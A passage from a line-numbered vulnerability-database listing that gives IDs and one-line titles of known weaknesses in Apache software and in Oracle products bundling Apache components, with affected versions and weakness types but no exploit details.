11175| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
11176| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
11177| [136370] Apache Fineract up to 1.2.x sql injection
11178| [136369] Apache Fineract up to 1.2.x sql injection
11179| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
11180| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
11181| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
11182| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
11183| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
11184| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
11185| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
11186| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
11187| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
11188| [134416] Apache Sanselan 0.97-incubator Loop denial of service
11189| [134415] Apache Sanselan 0.97-incubator Hang denial of service
11190| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
11191| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
11192| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11193| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11194| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
11195| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
11196| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
11197| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
11198| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
11199| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
11200| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
11201| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
11202| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
11203| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
11204| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
11205| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
11206| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
11207| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
11208| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
11209| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
11210| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
11211| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
11212| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
11213| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
11214| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
11215| [131859] Apache Hadoop up to 2.9.1 privilege escalation
11216| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
11217| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
11218| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
11219| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
11220| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
11221| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
11222| [130629] Apache Guacamole Cookie Flag weak encryption
11223| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
11224| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
11225| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
11226| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
11227| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
11228| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
11229| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
11230| [130123] Apache Airflow up to 1.8.2 information disclosure
11231| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
11232| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
11233| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
11234| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
11235| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11236| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11237| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11238| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
11239| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
11240| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
11241| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
11242| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
11243| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
11244| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
11245| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
11246| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
11247| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
11248| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
11249| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11250| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
11251| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11252| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
11253| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
11254| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
11255| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
11256| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
11257| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
11258| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
11259| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
11260| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
11261| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
11262| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
11263| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
11264| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
11265| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
11266| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
11267| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
11268| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
11269| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
11270| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
11271| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
11272| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
11273| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
11274| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
11275| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
11276| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
11277| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
11278| [127007] Apache Spark Request Code Execution
11279| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
11280| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
11281| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
11282| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
11283| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
11284| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
11285| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
11286| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
11287| [126346] Apache Tomcat Path privilege escalation
11288| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
11289| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
11290| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
11291| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
11292| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
11293| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
11294| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
11295| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
11296| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
11297| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
11298| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
11299| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11300| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
11301| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
11302| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
11303| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
11304| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
11305| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
11306| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
11307| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
11308| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
11309| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
11310| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
11311| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
11312| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
11313| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
11314| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
11315| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
11316| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
11317| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
11318| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
11319| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
11320| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
11321| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
11322| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
11323| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
11324| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
11325| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
11326| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
11327| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
11328| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
11329| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
11330| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
11331| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
11332| [123197] Apache Sentry up to 2.0.0 privilege escalation
11333| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
11334| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
11335| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
11336| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
11337| [122800] Apache Spark 1.3.0 REST API weak authentication
11338| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
11339| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
11340| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
11341| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
11342| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
11343| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
11344| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
11345| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
11346| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
11347| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
11348| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
11349| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
11350| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
11351| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
11352| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
11353| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
11354| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
11355| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
11356| [121354] Apache CouchDB HTTP API Code Execution
11357| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
11358| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
11359| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
11360| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
11361| [120168] Apache CXF weak authentication
11362| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
11363| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
11364| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
11365| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
11366| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
11367| [119306] Apache MXNet Network Interface privilege escalation
11368| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
11369| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
11370| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
11371| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
11372| [118143] Apache NiFi activemq-client Library Deserialization denial of service
11373| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
11374| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
11375| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
11376| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
11377| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
11378| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
11379| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
11380| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
11381| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
11382| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
11383| [117115] Apache Tika up to 1.17 tika-server command injection
11384| [116929] Apache Fineract getReportType Parameter privilege escalation
11385| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
11386| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
11387| [116926] Apache Fineract REST Parameter privilege escalation
11388| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
11389| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
11390| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
11391| [115883] Apache Hive up to 2.3.2 privilege escalation
11392| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
11393| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
11394| [115518] Apache Ignite 2.3 Deserialization privilege escalation
11395| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
11396| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
11397| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
11398| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
11399| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
11400| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
11401| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
11402| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
11403| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
11404| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
11405| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
11406| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
11407| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
11408| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
11409| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
11410| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
11411| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
11412| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
11413| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
11414| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
11415| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
11416| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
11417| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
11418| [113895] Apache Geode up to 1.3.x Code Execution
11419| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
11420| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
11421| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
11422| [113747] Apache Tomcat Servlets privilege escalation
11423| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
11424| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
11425| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
11426| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
11427| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
11428| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
11429| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
11430| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
11431| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
11432| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
11433| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
11434| [112885] Apache Allura up to 1.8.0 File information disclosure
11435| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
11436| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
11437| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
11438| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
11439| [112625] Apache POI up to 3.16 Loop denial of service
11440| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
11441| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
11442| [112339] Apache NiFi 1.5.0 Header privilege escalation
11443| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
11444| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
11445| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
11446| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
11447| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
11448| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
11449| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
11450| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
11451| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
11452| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
11453| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
11454| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
